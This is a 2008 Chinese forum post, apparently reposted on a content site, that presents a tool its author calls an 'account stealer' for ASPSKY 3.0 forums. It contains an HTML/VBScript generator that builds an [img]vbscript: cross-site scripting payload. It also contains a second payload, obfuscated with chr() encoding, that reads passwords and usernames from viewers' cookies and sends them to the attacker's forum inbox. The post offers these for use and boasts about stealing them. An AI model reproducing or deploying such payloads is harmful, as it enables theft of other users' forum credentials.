完美的解决跨站脚本弹框框

2008-04-09 04:10:59来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折


完美的解决跨站脚本得COOKIE弹框框的问题
同时把密码用户名发到你在论坛的邮相里,爽吧



先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:

<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[img]vbscript:execute("on error resume next: call document.body.inse
rtAdjacentHTML(""beforeEnd"",""<div style=display:none&
gt;<iframe id=sendmessage></iframe></div>""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title="" mid(document.cookie,instr(lcase(document.cookie),
""password"") 9,10) ""&message="" ""I am a goo
d boy"",""_self"") ")[/img]"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>
▲注意发送地址形如:http://www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录
最后
不用加/)<br>
发送的用户名:<input type=text name=who size=20>-------------
<input type=button name=change value=生成代码 onclick=changeq()><br>
生成的代码:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>

搞了大半天的结果,偷aspsky 3.0 密码的东东把下面的代码改一改
然后发到你的贴子里,只要有人看你的贴子他的密码就自动发到你的在
论坛上的邮箱里了,爽吧,其实我的是用VBScript写的snwcwt用javascript
写的没有双引号的问题而且可以同时写几行代码所以要实用一些!!
不过效果都差不多哈:)(注意要先把下面的东东改一下发送的地址然
后全部写在一行里)

[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch
r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr
(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119
)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c
hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr
(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1
10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6
1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101
)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)
&chr(115)&chr(97)&chr(103)&chr(101)&chr(61) chr(80)&chr(97)&chr(115)&chr(115)&ch
r(58) mid(lcase(document.cookie),instr(lcase(document.cookie),chr(112) chr(97) c
hr(115) chr(115) chr(119) chr(111) chr(114) chr(100)) 9,len(document.cookie)-ins
tr(lcase(document.cookie),chr(112) chr(97) chr(115) chr(115) chr(119) chr(111) c
hr(114) chr(100)) 9) chr(32) chr(32) chr(32) chr(32) chr(78)&chr(97)&chr(109)&ch
r(101)&chr(58) mid(lcase(document.cookie),instr(lcase(document.cookie),chr(117)
chr(115) chr(101) chr(114) chr(110) chr(97) chr(109) chr(101)) 9,(instr(lcase(do
cument.cookie),chr(117) chr(115) chr(101) chr(114) chr(99) chr(108) chr(97) chr(
115))-1)-instr(lcase(document.cookie),chr(117) chr(115) chr(101) chr(114) chr(11
0) chr(97) chr(109) chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(
61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&
chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1
03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116
)&chr(104)&chr(61)&chr(49))[/img]
简化形式:window.open(打开的连接,窗体名,窗体大小设置)
打开的连接:
第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....
对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:没开IPC$主机上传下载思路

下一篇:获取cookie的源代码